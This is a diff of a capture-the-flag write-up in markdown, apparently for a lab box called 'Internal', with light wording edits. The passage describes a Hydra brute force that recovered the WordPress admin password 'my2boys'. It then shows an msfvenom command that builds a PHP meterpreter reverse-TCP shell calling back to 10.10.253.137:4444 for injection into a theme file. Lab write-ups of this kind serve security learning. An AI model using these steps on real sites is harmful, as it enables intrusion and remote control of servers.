PacketFire/packetfire_site/content/post/internal-boot2root-writeup.md

 Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-12-05 05:19:49
 ```

-By the time I had returned I found that the bruteforce had yielded the password `my2boys` which I was able to confirm allowed me access to the admin panel.
+By the time I'd had returned I found that the bruteforce had yielded the password `my2boys` which I was able to confirm allowed me access to the admin panel.

 ![wordpress admin panel](/img/internal_http_wp_admin.png)

 ### Popping a shell through wp admin
-Once I had access to the admin panel, I decided to generate a reverse meterpreter shell that could be injected into the theme.
+With access to the admin panel, I decided to generate a reverse-tcp meterpreter shell that could be injected into the theme.

-I generated a `php/meterpreter/reverse_tcp` shell using `msfvenom` and backed up the index.php theme before replacing it with the generated shellcode.
+I generated a `php/meterpreter/reverse_tcp` shell using `msfvenom` and backed up the index.php theme template before replacing it with the following generated shellcode.

 ```
 root@kali:~# msfvenom -p php/meterpreter/reverse_tcp LHOST=10.10.253.137 LPORT=4444